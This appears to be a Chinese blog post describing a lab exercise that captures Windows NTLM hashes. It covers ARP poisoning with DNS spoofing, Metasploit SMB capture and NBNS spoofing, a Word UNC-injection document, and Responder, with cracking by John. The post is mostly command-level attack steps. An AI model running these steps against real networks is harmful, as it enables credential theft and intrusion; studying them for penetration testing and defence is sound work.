NTM_HASH获取实验
目录
当在内网没有思路的时候可以尝试hash钓鱼来获取突破口,常见的钓鱼方法有
- DNS劫持,嗅探获取hash
- SMB伪造,嗅探获取hash
- Word欺骗,获取hash
- 使用Responder辅助获取hash
环境
kali:192.168.241.157
windows server 2008:192.168.241.158
DNS劫持嗅探获取hash
ettercap配置好DNS劫持,先删除/etc/ettercap/etter.dns里面的内容,然后写入
* A 192.168.241.157
执行以下的操作:
ettercap -G
选择网卡
Hosts->Scan for hosts->hosts list
执行以下操作:
选择192.168.241.158这个IP
Mitm->ARP Poisoning
完事,目标机所走的流量都会转发到attack机上
此时启动msfconsole,使用以下模块
之后,受害机无论访问什么网页都会弹出一个框框,要求输出凭证
此时用户如果输入了密码,则会抓到hash
使用john破解捕获到的hash
PS:记得msf里面设置保存的hash路径,否则不会保存文件。我这里拿别人的图(- -!)
通过捕获smb流量获取hash
先用以下模块创建一个临时SMB,然后在启用抓取模块
use auxiliary/server/capture/smb
set srvhost 192.168.241.157
set johnpwfile /root/Desktop_hash
run
此时可以看见本地的445端口在工作
启动smb流量监听模块
use auxiliary/nbns/nbns_response
set SPOOFIP 192.168.241.157
set INTERFACE eth0
run
此时只要受害机访问attack的smb服务并输入用户的话将会捕获hash
如图
john破解
通过Word获取hash
use auxiliary/docx/word_unc_injector
set LHOST 192.168.241.157
run
同样使用
use auxiliary/server/capture/smb
set srvhost 192.168.241.157
set johnpwfile /root/Desktop_hash
run
此时在受害机上打开word将捕获到hash
收到hash
使用Responder辅助获取hash
仓库地址:
https://github.com/SpiderLabs/Responder
执行
python Responder.py -i 192.168.241.157 -I eth0
然后在受害机访问192.168.241.157将获取hash
在受害者看来是一个访问错误
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。
文章标题:NTM_HASH获取实验
本文作者:九世
发布时间:2019-10-12, 18:02:09
最后更新:2019-10-12, 20:30:55
原始链接:http://jiushill.github.io/posts/709f1946.html版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。